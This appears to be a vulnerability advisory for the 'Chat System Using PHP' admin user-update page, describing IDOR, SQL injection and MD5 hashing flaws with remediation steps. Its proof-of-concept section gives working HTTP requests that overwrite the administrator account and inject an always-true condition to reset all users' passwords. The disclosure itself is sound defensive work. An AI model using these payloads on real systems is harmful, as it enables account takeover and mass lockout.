# Vulnerability Summary: VULN-004-idor-sqli-update-user.md ## Vulnerability Overview This is a composite vulnerability involving **Insecure Direct Object Reference (IDOR)**, **SQL Injection (SQLi)**, and **Weak Password Hashing (MD5)**. * **Affected Product**: Chat System Using PHP (v1.0) * **Vulnerable File**: `/admin/update_user.php` * **Trigger Method**: POST request with parameters `id` (IDOR), `name`, `username`, `password` (SQLi) * **Core Logic**: An attacker can overwrite the information of any user (including administrators) by modifying the `id` parameter. Additionally, because the SQL query does not use prepared statements, the attacker can inject an `UPDATE` statement to batch-modify the passwords of all users. ## Impact Scope * **Complete Account Takeover**: Any authenticated user can overwrite the credentials of any account, including administrators. * **Privilege Escalation**: Low-privilege users can reset administrator credentials to become administrators. * **Password Leakage**: If an unchanged password is submitted, the database stores it in plaintext, leading to password leakage. * **Mass Account Lockout**: By exploiting SQL injection, an attacker can modify the passwords of all users at once, preventing all users from logging in. ## Remediation 1. **Enforce Ownership Verification**: Ensure users can only update their own accounts (verify that `$_POST['id']` matches `$_SESSION['id']`). 2. **Use Prepared Statements**: Replace the raw query with `mysqli_prepare` and `bind_param` to prevent SQL injection. 3. **Strong Password Hashing**: Use `password_hash` (BCRYPT) instead of MD5, and use `password_verify` for verification. 4. **Remove Plaintext Fallback Logic**: Remove the code logic that "stores plaintext if the password hasn't changed"; always hash the password. 5. **CSRF Token Verification**: Add a CSRF Token to the form and verify it on the server side. 6. **Role-Based Access Control (RBAC)**: Restrict modifications to other users' accounts to administrators only. 7. **Secondary Verification for Sensitive Operations**: Require the entry of the current password before modifying the username or password. ## Proof of Concept (PoC) ### 1. Unauthorized Modification of a Single User (IDOR) ```http POST /admin/update_user.php HTTP/1.1 Host: localhost:8081 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=4d80cc7875c80d8dca3aa2092609f1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Referer: http://localhost:8081/admin/update_account.php Connection: keep-alive edit=1&id=1&name=Administrator&username=admin&password=attacker_new_password ``` ### 2. Batch Modification of All Users' Passwords (SQL Injection) ```http POST /admin/update_user.php HTTP/1.1 Host: localhost:8081 Content-Type: application/x-www-form-urlencoded ... (Header omitted for brevity) ... edit=1&id=1' OR '1'='1&name=pwned&username=pwned&password=pwned ``` ### 3. SQL Statement Executed on the Backend (After Injection) ```sql UPDATE user SET uname='pwned', username='pwned', password=MD5('pwned') WHERE userid='1' OR '1'='1' ```